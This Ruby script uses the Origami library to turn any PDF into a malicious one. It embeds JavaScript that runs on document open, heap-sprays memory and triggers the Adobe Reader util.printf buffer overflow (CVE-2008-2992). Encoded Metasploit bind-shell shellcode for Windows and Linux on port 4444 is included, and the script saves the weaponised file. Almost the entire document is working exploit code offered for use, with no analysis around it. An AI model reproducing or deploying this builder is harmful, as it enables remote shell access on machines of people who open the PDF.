#!/usr/bin/env ruby 

begin
  require 'origami'
rescue LoadError
  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
  $: << ORIGAMIDIR
  require 'origami'
end
include Origami

pdf = PDF.read(ARGV[0])

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
win32_bin = "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"


# linux/x86/shell_bind_tcp - 105 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# AppendExit=false, PrependSetresuid=false, 
# PrependSetuid=false, LPORT=4444, RHOST=, 
# PrependSetreuid=false
linux_bin = "%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd"

shellcode = linux_bin

jscript = %Q|
/*
From: http://www.milw0rm.com/exploits/7006

Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992

Thanks to coresecurity for the technical background. 

6Nov,2008: Exploit released by me 

Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================

//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com
*/

    app.alert("Prepare the spray");

    var shellcode = unescape("#{shellcode}");

    //Heap Spray starts here - Kiddos dont mess up with this
    var nop ="";
    for (i = 128;i >= 0; --i) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
    heapblock = nop + shellcode;

    bigblock = unescape("%u9090%u9090");
    headersize = 20;
    spray = headersize+heapblock.length
    while (bigblock.length<spray) bigblock+=bigblock;

    fillblock = bigblock.substring(0, spray);
    block = bigblock.substring(0, bigblock.length-spray);

    while(block.length+spray < 0x40000) block = block+block+fillblock;

    mem = new Array();
    for (i=0;i<1400;i++) mem[i] = block + heapblock;

    app.alert("Pull the trigger");

// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow

var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);
//    util.printf("%45000.45000f", 0);

|

exploit = Action::JavaScript.new(Stream.new(jscript))
pdf.onDocumentOpen( exploit )
pdf.save("#{File.basename($0, '.rb')}.pdf")

